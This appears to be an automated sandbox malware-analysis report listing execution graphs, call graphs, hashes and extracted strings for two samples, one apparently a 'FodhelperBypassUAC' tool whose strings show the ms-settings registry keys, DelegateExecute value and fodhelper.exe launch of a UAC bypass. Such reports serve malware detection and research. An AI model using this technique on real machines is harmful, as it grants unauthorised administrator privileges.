                                                                                                                                                          execution_graph 291 4023f2 _controlfp 292 4010c4 2 API calls 291->292 293 402473 292->293 277 4022fa 278 40232c 277->278 281 40224f 278->281 280 4023e5 282 402285 281->282 285 4010c4 282->285 284 4022be 284->280 286 402480 285->286 287 4010e7 memset 286->287 288 40115b 287->288 289 401214 sprintf 288->289 290 4012bd 289->290 290->284

                                                                                                                                                          Callgraph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                          • Disassembly available
                                                                                                                                                          callgraph 0 Function_00401443 1 Function_004010C4 15 Function_004019D8 1->15 16 Function_00401D58 1->16 34 Function_00401000 1->34 49 Function_00401C98 1->49 50 Function_00401D98 1->50 51 Function_00401D18 1->51 2 Function_004017C6 3 Function_004024C7 4 Function_004022CB 5 Function_0040224F 5->1 19 Function_00402158 5->19 27 Function_004021EC 5->27 6 Function_0062346D 7 Function_00623E76 8 Function_00401BD8 28 Function_004018EF 8->28 9 Function_00401F58 9->28 10 Function_00401DD8 10->28 11 Function_00401C58 11->28 12 Function_00401B58 12->28 13 Function_00401AD8 13->28 14 Function_00401A58 14->28 15->28 16->28 17 Function_00401CD8 17->28 18 Function_00402058 18->28 20 Function_004020D8 20->28 21 Function_00401FD8 21->28 22 Function_00401E58 22->28 23 Function_00401ED8 23->28 24 Function_00623678 25 Function_006230C0 26 Function_004021E5 65 Function_004014B4 28->65 29 Function_00401970 30 Function_004023F2 30->1 31 Function_00402477 32 Function_00623CDA 33 Function_004022FA 33->5 35 Function_00623D22 36 Function_00401784 37 Function_00402487 38 Function_006234AC 39 Function_006236B7 40 Function_00402497 41 Function_00401F18 41->28 42 Function_00402018 42->28 43 Function_00401C18 43->28 44 Function_00401A98 44->28 45 Function_00401B98 45->28 46 Function_00401B18 46->28 47 Function_00401A18 47->28 48 Function_00401998 48->28 49->28 50->28 51->28 52 Function_00402118 52->28 53 Function_00402098 53->28 54 Function_00401F98 54->28 55 Function_00401E18 55->28 56 Function_00401E98 56->28 57 Function_006232B8 58 Function_00623686 59 Function_00623004 60 Function_00623384 61 Function_004024A7 62 Function_00623D8A 63 Function_00623989 64 Function_00623290 65->0 65->29 66 Function_004024B7 67 Function_00623D9A 68 Function_004010BD

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 004010C4 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memsetsprintf
                                                                                                                                                          • String ID: M,1]X
                                                                                                                                                          • API String ID: 4041149307-3282636315
                                                                                                                                                          • Opcode ID: f025086886e33f02448ab4351ee0044f6475c1f81167808764aa881225fd618a
                                                                                                                                                          • Instruction ID: 39431a9c6eb76416a74e9ecc622619c51ee20e8814d728a91cb63a132b490c0f
                                                                                                                                                          • Opcode Fuzzy Hash: f025086886e33f02448ab4351ee0044f6475c1f81167808764aa881225fd618a
                                                                                                                                                          • Instruction Fuzzy Hash: 4E712B61702B148DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3DCA448744
                                                                                                                                                          Function 00401000 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 33 401000-401045 call 402478 36 401048-401050 33->36 37 4010b6-4010bb 36->37 38 401056-4010b4 36->38 38->36
                                                                                                                                                          Strings
                                                                                                                                                          • h_mx+]><w=kk_)!,s5&)b_bg:a)=bh,4, xrefs: 00401098
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: h_mx+]><w=kk_)!,s5&)b_bg:a)=bh,4
                                                                                                                                                          • API String ID: 0-462813950
                                                                                                                                                          • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                                                                                                          • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                                                                                                                          • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                                                                                                          • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                                                                                                                          Function 004022FA Relevance: .1, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                                                                                                                          • Instruction ID: 9686121eb9f72fae5e10ab2d8a3ac4b9ff7170e1f7ab924ecbeb4b8f0178945f
                                                                                                                                                          • Opcode Fuzzy Hash: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                                                                                                                          • Instruction Fuzzy Hash: 9F215B64702A149CEA44DB67DD653A933A5B74DFC8F808436AE0CA73A5EE7DC6508344
                                                                                                                                                          Function 0040224F Relevance: .0, Instructions: 34COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 56 40224f-4022ca call 402158 call 4010c4 call 4021ec
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memsetsprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4041149307-0
                                                                                                                                                          • Opcode ID: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                                                                                                                          • Instruction ID: 0ef21ab13f0e72f5e82b28ca8a1d802b698ef2cd9161ee3339a6462a6fe8d703
                                                                                                                                                          • Opcode Fuzzy Hash: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                                                                                                                          • Instruction Fuzzy Hash: 1501E476702B488DDB40DF67DC9139833A4B349BC8F008826AE0CA7B68DA38C6618744

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00401D58 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                                                                                                                          • Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
                                                                                                                                                          • Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                                                                                                                          • Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54
                                                                                                                                                          Function 00401D18 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                                                                                                                          • Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
                                                                                                                                                          • Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                                                                                                                          • Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54
                                                                                                                                                          Function 004019D8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                                                                                                                          • Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
                                                                                                                                                          • Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                                                                                                                          • Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94
                                                                                                                                                          Function 00401D98 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                                                                                                                          • Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
                                                                                                                                                          • Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                                                                                                                          • Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54
                                                                                                                                                          Function 00401C98 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                                                                                                                          • Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
                                                                                                                                                          • Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                                                                                                                          • Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:24.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:17.7%
                                                                                                                                                          Total number of Nodes:62
                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                          execution_graph 378 7ff6cf671258 382 7ff6cf671a8c SetUnhandledExceptionFilter 378->382 383 7ff6cf671fb6 _seh_filter_exe 333 7ff6cf671274 334 7ff6cf67128d 333->334 335 7ff6cf6713cb 334->335 336 7ff6cf671295 __scrt_acquire_startup_lock 334->336 358 7ff6cf6718e8 IsProcessorFeaturePresent 335->358 338 7ff6cf6713d5 336->338 341 7ff6cf6712b3 __scrt_release_startup_lock 336->341 339 7ff6cf6718e8 9 API calls 338->339 340 7ff6cf6713e0 339->340 343 7ff6cf6713e8 _exit 340->343 342 7ff6cf6712d8 341->342 344 7ff6cf67135e _get_initial_narrow_environment __p___argv __p___argc 341->344 347 7ff6cf671356 _register_thread_local_exe_atexit_callback 341->347 353 7ff6cf671000 6 API calls 344->353 347->344 350 7ff6cf67138b 351 7ff6cf671395 350->351 352 7ff6cf671390 _cexit 350->352 351->342 352->351 364 7ff6cf671170 353->364 356 7ff6cf671a38 GetModuleHandleW 357 7ff6cf671387 356->357 357->340 357->350 359 7ff6cf67190e 358->359 360 7ff6cf67191c memset RtlCaptureContext RtlLookupFunctionEntry 359->360 361 7ff6cf671956 RtlVirtualUnwind 360->361 362 7ff6cf671992 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 360->362 361->362 363 7ff6cf671a12 362->363 363->338 365 7ff6cf671179 364->365 366 7ff6cf67114c 365->366 367 7ff6cf671438 IsProcessorFeaturePresent 365->367 366->356 368 7ff6cf671450 367->368 373 7ff6cf67150c RtlCaptureContext 368->373 374 7ff6cf671526 RtlLookupFunctionEntry 373->374 375 7ff6cf67153c RtlVirtualUnwind 374->375 376 7ff6cf671463 374->376 375->374 375->376 377 7ff6cf671404 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 376->377 384 7ff6cf6713a2 385 7ff6cf671a38 GetModuleHandleW 384->385 386 7ff6cf6713a9 385->386 387 7ff6cf6713ad 386->387 388 7ff6cf6713e8 _exit 386->388 389 7ff6cf6713f0 392 7ff6cf6717c0 389->392 393 7ff6cf6713f9 392->393 394 7ff6cf6717e3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 392->394 394->393 395 7ff6cf671190 396 7ff6cf6711a0 395->396 408 7ff6cf6715f8 396->408 398 7ff6cf6718e8 9 API calls 399 7ff6cf671245 398->399 400 7ff6cf6711c4 _RTC_Initialize 405 7ff6cf671227 400->405 416 7ff6cf671880 InitializeSListHead 400->416 405->398 407 7ff6cf671235 405->407 409 7ff6cf671609 408->409 410 7ff6cf67163b 408->410 411 7ff6cf671678 409->411 414 7ff6cf67160e __scrt_acquire_startup_lock 409->414 410->400 412 7ff6cf6718e8 9 API calls 411->412 413 7ff6cf671682 412->413 414->410 415 7ff6cf67162b _initialize_onexit_table 414->415 415->410

                                                                                                                                                          Callgraph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                          • Disassembly available
                                                                                                                                                          callgraph 0 Function_00007FF6CF67186C 1 Function_00007FF6CF67176C 2 Function_00007FF6CF6717A8 2->1 3 Function_00007FF6CF6718A8 14 Function_00007FF6CF671898 3->14 18 Function_00007FF6CF6718A0 3->18 4 Function_00007FF6CF6718E8 19 Function_00007FF6CF6718E0 4->19 5 Function_00007FF6CF671B34 6 Function_00007FF6CF671274 6->4 13 Function_00007FF6CF67171C 6->13 16 Function_00007FF6CF6718D8 6->16 28 Function_00007FF6CF6718D0 6->28 30 Function_00007FF6CF6715BC 6->30 34 Function_00007FF6CF671A38 6->34 37 Function_00007FF6CF671684 6->37 39 Function_00007FF6CF671000 6->39 41 Function_00007FF6CF671580 6->41 43 Function_00007FF6CF671740 6->43 7 Function_00007FF6CF671EF4 23 Function_00007FF6CF671F14 7->23 8 Function_00007FF6CF671B70 9 Function_00007FF6CF671870 10 Function_00007FF6CF6713F0 42 Function_00007FF6CF6717C0 10->42 11 Function_00007FF6CF671170 20 Function_00007FF6CF67150C 11->20 36 Function_00007FF6CF671404 11->36 12 Function_00007FF6CF671A9C 29 Function_00007FF6CF671E3C 13->29 15 Function_00007FF6CF671258 15->0 21 Function_00007FF6CF671A8C 15->21 17 Function_00007FF6CF6713A2 17->34 22 Function_00007FF6CF671894 24 Function_00007FF6CF671FD4 25 Function_00007FF6CF671715 26 Function_00007FF6CF671190 26->0 26->2 26->3 26->4 26->9 26->22 27 Function_00007FF6CF671890 26->27 31 Function_00007FF6CF6715F8 26->31 32 Function_00007FF6CF671878 26->32 33 Function_00007FF6CF671AF8 26->33 38 Function_00007FF6CF6718C4 26->38 40 Function_00007FF6CF671880 26->40 30->8 30->27 31->4 31->29 35 Function_00007FF6CF671FB6 39->11 41->29 43->27

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00007FF6CF671000 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 68registryprocessCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
                                                                                                                                                          • Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateValue$DeleteProcessSleepTree
                                                                                                                                                          • String ID: $/c C:\Windows\System32\fodhelper.exe$C:\Windows\System32\cmd.exe$DelegateExecute$Software\Classes\ms-settings$Software\Classes\ms-settings\Shell\open\command$cmd.exe$h
                                                                                                                                                          • API String ID: 1234705242-1006108852
                                                                                                                                                          • Opcode ID: fbe057aa7f93a7141855c5e75842a416b8d1fa6e2ee3104d1f3f26d9b9048bbb
                                                                                                                                                          • Instruction ID: d7e93858d27d0e557dfe94564e34582ced3ea4cc7658a4b7d3981edad4e9b01a
                                                                                                                                                          • Opcode Fuzzy Hash: fbe057aa7f93a7141855c5e75842a416b8d1fa6e2ee3104d1f3f26d9b9048bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 8E319232A18B8182E720CF25F84436A73A4FB98798F515336EADC43A65DF7DE194DB10
                                                                                                                                                          Function 00007FF6CF671274 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
                                                                                                                                                          • Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1133592946-0
                                                                                                                                                          • Opcode ID: a1a5c47ac42bc9f6b5e7f84630c06fd07018a4f2f4a33fc2a2e5a1a49a473625
                                                                                                                                                          • Instruction ID: bd436a6ebcc3cf34cd400fae009105057aa0540c0c27269d90cbf6cbb2bba288
                                                                                                                                                          • Opcode Fuzzy Hash: a1a5c47ac42bc9f6b5e7f84630c06fd07018a4f2f4a33fc2a2e5a1a49a473625
                                                                                                                                                          • Instruction Fuzzy Hash: 7A316B21E0C60382FB10AF2394113B92399AF85786F464137EACEC76D7DE2DE844A771

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00007FF6CF6718E8 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
                                                                                                                                                          • Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                          • Opcode ID: 7dd360d24bda2faca9ae8fced7b4ff82ffb68c0ef987e2d87d8691a76b6eef11
                                                                                                                                                          • Instruction ID: 57ae147b5d6af4fa60c086c3f589ca63892b8e916b44c1c333a2c155ed02ee77
                                                                                                                                                          • Opcode Fuzzy Hash: 7dd360d24bda2faca9ae8fced7b4ff82ffb68c0ef987e2d87d8691a76b6eef11
                                                                                                                                                          • Instruction Fuzzy Hash: BE314F72609B8186EB609F61E8403E97365FB84745F44443BDBCE87B95DF38D548D720
                                                                                                                                                          Function 00007FF6CF6717C0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
                                                                                                                                                          • Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                          • Opcode ID: cf998f6c97444c4b3dcaa78bd1a9f44327e8ddf9bed578a56768ffa664cd96bd
                                                                                                                                                          • Instruction ID: e1e2e9e1556de5320b4437142ad01791b324b407fbf459f2f7b18d0a87c97d8f
                                                                                                                                                          • Opcode Fuzzy Hash: cf998f6c97444c4b3dcaa78bd1a9f44327e8ddf9bed578a56768ffa664cd96bd
                                                                                                                                                          • Instruction Fuzzy Hash: 9D113022B14F06CAEB00CF61E8542B933A8FB19759F440E36DAAD867A4DF7CE154D350
                                                                                                                                                          Function 00007FF6CF671A8C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
                                                                                                                                                          • Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          • Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
